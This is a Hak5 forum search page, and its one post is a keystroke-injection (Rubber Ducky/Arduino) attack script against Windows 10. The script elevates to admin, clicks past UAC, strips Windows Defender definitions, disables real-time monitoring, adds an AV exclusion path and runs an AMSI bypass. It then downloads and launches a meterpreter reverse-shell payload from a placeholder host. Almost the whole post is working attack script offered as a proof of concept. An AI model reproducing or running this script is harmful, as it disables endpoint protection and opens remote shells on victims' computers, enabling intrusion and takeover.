Jump to content

Search the Community

Showing results for tags 'windows 10; payload; meterpreter'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Plunder Bug
    • Bash Bunny
    • Signal Owl
    • USB Rubber Ducky
    • Packet Squirrel
    • LAN Turtle
    • Screen Crab
    • Shark Jack
    • Key Croc
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 1 result

  1. Disclaimer: Originally written in ducky script, then converted to Arduino for a school project. Video linked uses Arduino Pro Micro. POC: https://youtu.be/3hDdLbwFiM8 REM Title: msfQuack.txt REM Author: mikeOxmaul (Props: Dan Tentler <Twitter @Viss> and Matt Graeber <Twitter @mattifestation>) REM Date: 20020308 REM Target: Windows 10 (v. 1809) REM Assumptions: REM 1. Used against unlocked device w/admin lvl privileges REM 2. Default 'prompt for consent' UAC policy in place for admin accts REM Script will do the following: REM 1. Remove Security Definitions for Windows Defender & Disable IOffice AV Protection REM 2. Disable Real Time Monitoring Protection & Add Exclusion Path REM 3. Download, Save and Run payload (windows/meterpreter/reverse_tcp) REM Apologies in advance for the funky delays and not using 'GUI r'. Tested on VirtualBox 6.1 on a macOS host. REM Payload Start DELAY 3000 REM 3 second delay for device to register CTRL ESC REM keyboard shortcut for search bar DELAY 1700 STRING cmd REM searching for cmd prompt DELAY 750 CTRL SHIFT ENTER REM 'run as admin' keyboard shortcut DELAY 2500 ALT y REM bypass UAC prompt DELAY 1500 STRING cd %userprofile% ENTER DELAY 100 STRING "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true REM Removes all security definitions for windows defender and disables AV protection (credit to Dan Tentler) ENTER DELAY 100 STRING powershell ENTER DELAY 2500 STRING Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath "<define exclusion path here>" REM Disables defender's 'real time monitoring' and sets exclusion path in event defender conducts a scan ENTER DELAY 100 STRING "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" REM One line AMSI bypass (courtesy of Matt Graeber) ENTER DELAY 100 STRING iex (New-Object System.Net.WebClient).DownloadFile('http://<ipaddr>/<payload>','<path\to\payload>');Start-Process .\"<path\to\payload>"\ ENTER DELAY 100 STRING exit ENTER REM Exiting Powershell DELAY 1000 STRING exit ENTER REM End of Payload
  • Create New...